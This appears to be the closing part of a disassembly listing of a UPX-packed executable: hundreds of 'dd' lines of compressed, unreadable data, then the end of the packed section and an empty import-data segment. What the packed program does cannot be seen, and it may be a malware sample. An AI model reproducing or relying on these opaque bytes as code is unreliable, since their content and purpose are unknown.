dd 93FCC3D0h, 5CCAB0ACh, 5AD38A83h, 0EDE1FD84h, 0A3BBDB9Fh
dd 8D8379F3h, 80572842h, 0F07C0EA1h, 0AF0FD77h, 715CB79Bh
dd 0DF739E8Ah, 8C7B139h, 6B5E3334h, 69B36F49h, 3BCDF8F9h
dd 1669A476h, 83C98D22h, 9CB95B90h, 0A6BCD9A8h, 0F8405B5Ah
dd 3C0584EBh, 0EA42000Dh, 0D5F13BAFh, 105844CEh, 9ABD1D58h
dd 36C8F251h, 6CB70A61h, 34F62120h, 0ECF2335Dh, 901463EFh
dd 2C3738EEh, 23DB6D32h, 0D559A4A4h, 0DCBB2623h, 0E016C2F1h
dd 155228D8h, 31A9BDBEh, 0F225036Ch, 5DC12C2Fh, 584DA6CDh
dd 744F4A79h, 920652D5h, 74D88777h, 8864BFA5h, 0E8E86620h
dd 0FE93E938h, 2E28B2D3h, 20CBB0A7h, 2F43FE52h, 0B1ED283Bh
dd 6F042E6Ch, 86D3F8C9h, 2A3D5D5Bh, 0C0C46A3Ch, 0CF0894B8h
dd 0B577A2A1h, 0D5AF2C48h, 47F3D0FEh, 0C52731Ah, 7D5AFCCCh
dd 0DF2B102Fh, 0B9FC5279h, 0A3633B4h, 0ACA0401Ch, 0ACE93E5Eh
dd 0C7230747h, 0AF17CEFEh, 66BB1C6h, 220D2090h, 503DC5ECh
dd 0CACFAED3h, 40FF5C85h, 66B42193h, 0FE25B7E9h, 0DDA3A052h
dd 958AE360h, 4A56B14Fh, 0EFD8A3A0h, 9D849F9Dh, 312EED47h
dd 26B1ECEBh, 4F7C947h, 3B5D0609h, 530ADFE0h, 34B9BEF5h
dd 7237E7Ch, 950A22EEh, 0D6012C7Ah, 0D202C392h, 0EA7FAAC0h
dd 8469963Fh, 189CC2AEh, 4337812h, 0C8260434h, 5BC00E62h
dd 7DF8CAB3h, 76E172C3h, 93B0E9A1h, 0DD4C4745h, 9863E48Ch
dd 84EF5AF3h, 77918C96h, 23989454h, 285E28E8h, 41BEAFAFh
dd 7BD683E9h, 0EB8B2D1Ch, 85297408h, 9C5A8FD1h, 0E3758D23h
dd 0FA6D3C77h, 748AA0AFh, 0F8BC9BEFh, 3F904B46h, 2230E4D4h
dd 0F05A05DFh, 0D8E62139h, 0DC76147Bh, 80240F75h, 0A33102DEh
dd 3B6993E7h, 0C569B4B4h, 0EC371611h, 0D82AB281h, 0F07C620Ah
dd 3CC05A52h, 699BF5C6h, 1FB05C5Eh, 48F9B6DCh, 845F3A09h
dd 0A20D9CC5h, 0DA18AB67h, 0A56E5544h, 0BB09F7FBh, 0AEB8C9C9h
dd 69FCACB0h, 329DE9B6h, 1FA99C95h, 1ADC3625h, 1AA74D47h
dd 3496979h, 0E3443E39h, 0CA572016h, 0D720080Dh, 8E12F4C3h
dd 9F0FCDF4h, 73F1DCD7h, 76C28689h, 6FA48E9Eh, 37B26160h
dd 3BBE456Ah, 1468515Dh, 0FB6E2232h, 0ED5A1801h, 0DA2B0211h
dd 0A10EDCE7h, 0B801C0CBh, 95EECEEAh, 76D4B0B4h, 4FD395B7h
dd 1CB79197h, 3E9D6154h, 17695944h, 0F4562627h, 0F8473529h
dd 0DD2C0411h, 8500F4E9h, 0E007EDF7h, 0A3CCFAE6h, 4BF38D9Bh
dd 46DEAFBFh, 53BE9788h, 5B87B77h, 79F484Eh, 3C4E4E4Ah
dd 0F35B2621h, 0C8161F05h, 0AB3EF1F0h, 0A32BC5F7h, 80EADCC0h
dd 5D9CB5A2h, 45D5AFBFh, 44A7BB81h, 4DDD0A78h, 63F67122h
dd 87D3838h, 0FC4D3720h, 0C34F0848h, 0CF3E130Fh, 0B800BAF5h
dd 0A380C4CDh, 24DC818Bh, 62DEAAA1h, 43BB8393h, 0D89500Dh
dd 149E3C4Fh, 55467A7Ch, 0FE763C6Ch, 0A9051415h, 0BA4D902Dh
dd 50398F8Fh, 0D85B404Bh, 90177BBDh, 16A9E4C1h, 1927F14h
dd 0AB170132h, 33BC6C07h, 91B1A430h, 0DE1B766Eh, 0EB1C61F0h
dd 8BC81259h, 0EF159675h, 0CF861F2Ch, 8C05B988h, 770087CDh
dd 263E6B43h, 0B0D1CCD6h, 65C32791h, 2D76D02Ah, 7C58CDBAh
dd 7B2CE9ACh, 4FF1E2A1h, 0AF5BB6A9h, 0DE729C98h, 0CC1C4BE5h
dd 0E5A0FBE6h, 23B6E168h, 2F657275h, 3AB30E3Fh, 99F44F25h
dd 4D3D75AEh, 0B054D052h
dd 0DA4A6E61h, 0C2568968h, 9A2BCB97h, 0BCC8EB80h, 1A0E39C5h
dd 15B1ECF0h, 5FD38633h, 23365908h, 9E0ADFD9h, 4827EEA3h
dd 0FBE3CB4Dh, 4EEA9A66h, 0BD517C70h, 8B2BD5C1h, 0AF51F9E6h
dd 0FD968D8Ch, 2980CA42h, 0C98305EEh, 0F354FBFAh, 5CC037E4h
dd 73063659h, 1FE11F48h, 0A1054C7Eh, 0B84C7A9Eh, 9D27D28Dh
dd 0B43FF3EDh, 0A9D4E0E8h, 0EBFED391h, 1B95007Ch, 41D2E800h
dd 1FB01716h, 3D577D63h, 10E51343h, 9C0177B3h, 0E219BA42h
dd 0A00E89E2h, 0E176C99Eh, 7DBF8B6h, 3F8F3E58h, 0D94266E4h
dd 0B080D88Fh, 63CBED87h, 0F273A428h, 0EA157019h, 8D440555h
dd 0FF436E6Ch, 0B0CF7AD3h, 2371ACB6h, 0C3A37E24h, 0A9422C8h
dd 72E0E0DFh, 0AF8A4B3h, 2AE4923h, 256CDB23h, 93100B15h
dd 9227525Ah, 0DB4E1A10h, 0A621EE17h, 283C97D4h, 0DEA87739h
dd 0E01F4CC3h, 13B0EBF1h, 614B7CC0h, 0C0DD3811h, 6FD8E89Bh
dd 0E3F46734h, 8D12610Ah, 0A43D0CF1h, 0EDD7B79h, 0D2578BCFh
dd 34C324FEh, 0E895F092h, 0E8542429h, 8A442B8Ah, 44D83323h
dd 0FC4A9949h, 7106010Fh, 0A879DDCBh, 0CB645F6Dh, 0B621771Eh
dd 0CD60E5D9h, 718624A2h, 0FBA09758h, 67FD1255h, 0BE3065C5h
dd 12D3CEDEh, 0E367137Fh, 6D310C8Fh, 0D4481516h, 0ED00808h
dd 0B2765D95h, 14C877DFh, 2674AFB2h, 0C7A54830h, 604ACDCCh
dd 0DA471C11h, 0CDC8477h, 1E60D711h, 3EFC1732h, 97206169h
dd 69D5A70Dh, 0B80DE9ACh, 900E83B2h, 9187AEC6h, 35794E42h
dd 39888442h, 7FCB88DEh, 0C5F21CC1h, 0C827F4F3h, 63C7376Eh
dd 2E785C6Eh, 14A8997Ch, 0A80C5729h, 0EE022F2Ch, 873BC4C4h
dd 0C1B43954h, 9167C3F2h, 1B9EF5F4h, 47DB0731h, 48D7EE73h
dd 16A11D1Dh, 2548637Fh, 0C0646503h, 36C8622Dh, 0BA7E5539h
dd 0D1659C67h, 0BB34F4A6h, 9EC5CAD8h, 57CFA0B8h, 0B83FBBEBh
dd 43E729DBh, 0A65B948Bh, 18050002h, 871C478Dh, 6133340Ah
dd 85666CE6h, 1EF4018Ah, 6E7893BEh, 0CAA27D05h, 46F487CFh
dd 3597219h, 0FB51FDCDh, 0BA7C9918h, 3C001B35h, 0D5162816h
dd 9A2C310Ah, 62BAF06Fh, 37A69A6Eh, 0EDCE1D62h, 0F68A85A1h
dd 85C9C7BFh, 0DBB7E2F1h, 0BE1916Ch, 51E8E710h, 34AC2626h
dd 4D597E73h, 0D96D7A61h, 39BF6B26h, 0C367AEC0h, 0DA69F10Bh
dd 4408B0AFh, 8ACDF70h, 0B20F5084h, 0DEC8C3D8h, 0B320FB87h
dd 62F62DC9h, 37446F37h, 0C4610107h, 0EB77224Bh, 0FFC7827Ch
dd 5069A4BFh, 0D904A46Ah, 9097C2C3h, 1AADDDB0h, 0C57663EFh
dd 1EDA351Eh, 7138A191h, 21E03302h, 8E0B5B8h, 921AACDDh
dd 3D427877h, 0D0648D9Eh, 0E6EB4A24h, 96C6BDBCh, 15A9D5D2h
dd 127F15h, 86570131h, 58ED1987h, 5D0A47Dh, 13E41444h
dd 9D027196h, 0C110B4F7h, 0D8E8E384h, 7788A2A0h, 0F9BE95DEh
dd 0AD263225h, 278BC643h, 0B3F889FCh, 64C8B996h, 0FF007A29h
dd 81266D86h, 1C2298D3h, 0AF446EE4h, 4D57C60Fh, 5242629Bh
dd 0C4A91237h, 0F5250DC9h, 23B6D1CEh, 38A6F79Dh, 0DA1C0C64h
dd 65CA09E1h, 73EEC4B9h, 932933D5h, 3FB2F968h, 0C166A1DDh
dd 8B3F88FCh, 0C3313A52h, 0C61EC6F4h, 1CF159D4h, 894AF2F2h
dd 4AEE29CDh, 111D28AEh, 1FF3C8C3h, 8E234ED8h, 2CDC4E3Dh
dd 4305584Eh, 0E344A204h, 38C227A8h, 0B096F19Fh, 0EEFE3FD7h
dd 0BA4F1212h, 45E924BBh, 4F981B70h, 20073230h, 488BB614h
dd 2D355072h, 3A585331h, 0FE53C119h, 5375F5A3h, 0D8D537B0h
dd 1B4812C5h, 38BFA3EAh, 0BC6FDB5h, 73AF1D15h, 61E3AD24h
dd 0D411A482h, 8C141F51h, 3E17408Eh, 0FA727635h, 0E169489Fh
dd 0D6A9B7B6h, 2183B6FBh, 1C99CAC4h, 13EADFDEh, 2BC3692Ah
dd 638E0D08h, 0CE5D7074h, 687C5675h, 9E6988F9h, 699D0583h
dd 0B6709B9Ah, 0A0D0E2B1h, 265F5C37h, 0AC3FDFEFh, 38FAE0C4h
dd 55020C67h, 35F5EA48h, 7B0F3FD1h, 0F6037750h, 566A686Dh
dd 0F07F9AEBh, 0DBAF1595h, 868946FCh, 599C4CBh, 3C776757h
dd 6092F0C1h, 651D92F7h, 9F761E2Eh, 0C387614Ah, 8D1160B4h
dd 0B10AC6E1h, 364F7A49h, 0E2486F1Dh, 83B383A7h, 53C2EEBEh
dd 3B17402Ah, 0D643EBDCh, 0D5F87C03h, 0EF63E792h, 71351CD0h
dd 26EE4AF6h, 77534E28h, 49B5832Eh, 2E76FEEAh, 0E50F2EABh
dd 34045052h, 0AF2B1FFBh, 298CCB18h, 0B755590Dh, 0A9BAADFEh
dd 5D2C9ABEh, 0EBAAC242h, 9A2E694Ch, 822D5A04h, 365C87F2h
dd 0D05FF70Bh, 93735B5h, 0EA1FCE2h, 0A070F397h, 3CFDD85Ch
dd 52E40F11h, 4605A3E1h, 96123D0Dh, 69D6AA5Ch, 0AD44A936h
dd 0EAA8370Fh, 243899A9h, 0C2A9BD25h, 0F66444C7h, 200959D1h
dd 0B241F3F5h, 4DEF3A0Fh, 9CA02148h, 4A2165ADh, 9EE4CA4Fh
dd 0A83BC2E2h, 0EF92567Dh, 866AFEC4h, 0EDE8AAC1h, 5257C2C2h
dd 305C4D26h, 0CA40EEC0h, 7A5E0AF8h, 0D7F11C19h, 453834B6h
dd 8792C74Ah, 2E365151h, 8A7D6BEDh, 0BB36DE8Fh, 7D84F6A6h
dd 0FFA291A8h, 19562C57h, 2DBBEA6Fh, 0BCD66B02h, 69DD1FADh
dd 6191D02Eh, 41B7669h, 1A3DA2A4h, 0B549779Ah, 0FC7B0E03h
dd 2A44A291h, 0AADF7ABBh, 40A1BA9Eh, 18BC5319h, 0AA2EFCCDh
dd 55D838E1h, 0EFF0EAAFh, 82164285h, 1CA49164h, 0B0745F71h
dd 0AF0AD7D4h, 0DE7D9D83h, 0B01C4BE3h, 89A0FBE6h, 5D32EE21h
dd 0B3CCF7FBh, 60D32D8Ah, 2D71E625h, 1D428403h, 461B5352h
dd 5AC8AB6Ah, 47DF6077h, 0D95DA8B8h, 48B8E425h, 79BDD09h
dd 0DFB20EEFh, 0D4300304h, 7BF98C83h, 6E362010h, 810A7C81h
dd 0DCAE78AEh, 0E58D6A7Ch, 0F4817F6Fh, 0D74052F9h, 0B4452B79h
dd 0FBF8A8B7h, 9AE5C9A3h, 42C3E194h, 7A928FDAh, 5FE45990h
dd 378A2273h, 53E9B600h, 240EA17Ch, 0B87C476Dh, 8BE8D74Eh
dd 6EF3A980h, 0FD91BC03h, 256B13E1h, 1B90DEDBh, 70FB302Eh
dd 1C985936h, 1E6F405Eh, 0EB736B22h, 963C333Ch, 0D5214F52h
dd 0AF32EBFAh, 8204D2BFh, 8CE59A8Bh, 209EBFB9h, 6DCEABCBh
dd 4DBC9589h, 3D8E3C73h, 1BD1464Eh, 0E92A6F5Dh, 0B70E6668h
dd 0DA27071Bh, 0E56BB8EBh, 0BB18F9F2h, 0C2B5C7D9h, 73EBB9E8h
dd 38885B3h, 5CB99994h, 7ED87F68h, 4BC51A01h, 1A625D50h
dd 9F19373Dh, 22C0E26Dh, 0F0659BF3h, 54222795h, 4071AA45h
dd 3A1BCCB6h, 72C290AEh, 0B8050584h, 525083F6h, 0EFF42F2Eh
dd 73E2B508h, 6357E3B9h, 0D1165BE2h, 0BA17F08Eh, 0DB84DB5h
dd 0A63C9478h, 0E8E099FAh, 0FF55FD9Ah, 2EC1EEC0h, 44D85B6Bh
dd 0AB074119h, 5F9CED2h, 9390C366h, 12346F6Dh, 79607740h
dd 0FE5E00C5h, 63DD575Fh, 0FAEE3660h, 3512675Dh, 0DA41E8D7h
dd 8F583D5Ah, 0EB671EFEh, 6D3102D4h, 0B7C7C8BEh, 0FA13F690h
dd 0C87A7702h, 0E9718AF0h, 9428A334h, 83A58A59h, 7BA2F111h
dd 0AE85000Bh, 6F4B3FFBh, 52E52021h, 2DA4621Ah, 42214A3Dh
dd 96781607h, 5264471Fh, 0F9587C7Dh, 0DB22CED1h, 0A2BBA3C4h
dd 7D9D988Fh, 73F2E3D5h, 0B2C6F4A5h, 0B21FF54Dh, 53A4A7DCh
dd 49E53908h, 6EDBCFA6h, 953FEC99h, 0FC1D372Ah, 284D119Bh
dd 0BABC5354h, 0BD69681h, 0E450C55Dh, 7193D20Fh, 0CCD43434h
dd 0A10DE30Ch, 215A640Eh, 8AA44405h, 90C89D9Fh, 476091A3h
dd 556A6F70h, 17835A5Fh, 0E97B6C8Eh, 0FEAAD5D4h, 0D23F15B2h
dd 43D702EAh, 0B46F4418h, 70351917h, 871D75ACh, 0ACCC3A5Ch
dd 8569C0F8h, 45058CBAh, 0B0C52383h, 0FB8F8A88h, 0BF4EDBBAh
dd 0C1431818h, 3FD2FCEEh
dd 18D79572h, 64852470h, 8174240h, 442D6506h, 0E17EF109h
dd 30D988C3h, 28739E9Dh, 0D68AA3F7h, 88AECCCBh, 24B7E209h
dd 3991BB0Fh, 51058B1Fh, 197A2626h, 5E321D1Ch, 41AD5B73h
dd 44406B6Ah, 3CA87F26h, 0DAA71B97h, 0B30EB0AFh, 18D64CCEh
dd 1BC11CF6h, 332333C7h, 656C208h, 4973A831h, 910D0807h
dd 6FDBB218h, 0A73BC98Dh, 99CFF67Ch, 0D669A4A3h, 0DCB08037h
dd 0FFF92AC1h, 9EA22727h, 31C3EE60h, 77F9B08Dh, 37A1C2Ch
dd 9CD6300Eh, 74E0B71Eh, 0E8B71C12h, 0B94D1853h, 869A046Eh
dd 6A6FDCA6h, 0CE82BD09h, 5D3D7D3h, 2CB91953h, 0E7255601h
dd 5A0E19A6h, 315B8BDEh, 142A4916h, 9DB0DAD6h, 3D2F7472h
dd 349F1019h, 7A74A5Fh, 72D44648h, 5AA6DC84h, 21FA6BF5h
dd 0B7F9BFD7h, 54E84C94h, 4AB9ED29h, 0A136611Fh, 130513DFh
dd 2ACF7F27h, 0C66BB6A3h, 0AE7AD7A2h, 0FCC33DB1h, 88B089C8h
dd 0A9B6B983h, 9FCD872h, 47A10F0Eh, 56AA6625h, 5E9A58E8h
dd 0CB2ADC35h, 9A38D7EBh, 0CE56814Fh, 27910C12h, 0CC315052h
dd 0F99BF6F4h, 2D9DB14Eh, 2B720DF2h, 0B5DE3939h, 50DEED8Ah
dd 7C81BA35h, 3237E7Ch, 950A76F6h, 0D6032D7Ah, 0D4DD6C91h
dd 157F9A98h, 31BAA42Ah, 1F1928D6h, 0D0C2DDDDh, 75F2C991h
dd 0A445961Ah, 8D07021Eh, 0B92E4AF2h, 35CA365Eh, 0B77C5B28h
dd 0FE642B0Fh, 267AA593h, 0FC91BC52h, 12C28ED1h, 530469h
dd 0B18CFFCFh, 2F6ED719h, 0EB021D39h, 4D9A8783h, 5D3FABA5h
dd 83520AF4h, 0DA634A88h, 94758A9Fh, 840DD1AAh, 7ECFC2E9h
dd 0CED9F791h, 0C230053Fh, 80E1467h, 8102D7D5h, 7FEBC0ECh
dd 0BAD47834h, 0BC763B14h, 0C559A13Bh, 7998FB9Ah, 86784D4Eh
dd 2EDA42F1h, 0DE0152EFh, 0B3CAC5D8h, 0CF87045Dh, 17FA2519h
dd 7B676C1Ch, 1926AE50h, 0FB3D02A3h, 69C1802Eh, 546BA6B9h
dd 0D003A568h, 59A6FB9Fh, 0DA2CD9AFh, 0CECD18F5h, 3634F8F7h
dd 3E0CE1E1h, 767E8DF7h, 3CCA4C4Bh, 0A4384CDAh, 0BB5F9279h
dd 0F2A49190h, 0E94D10A7h, 37CBFBEh, 0D5AAD5D5h, 7A4DEBC8h
dd 6A1A0E27h, 26EEE19Ah, 71ED5036h, 31C4746h, 0C2037A09h
dd 5BCB6FFFh, 0CD51A73Ch, 1B96A44Ah, 0FF4DDB46h, 150Dh dup(0)
UPX2 ends
; Section 4. (virtual address 00019000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00019000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31439000h
align 2000h
_idata2 ends
end start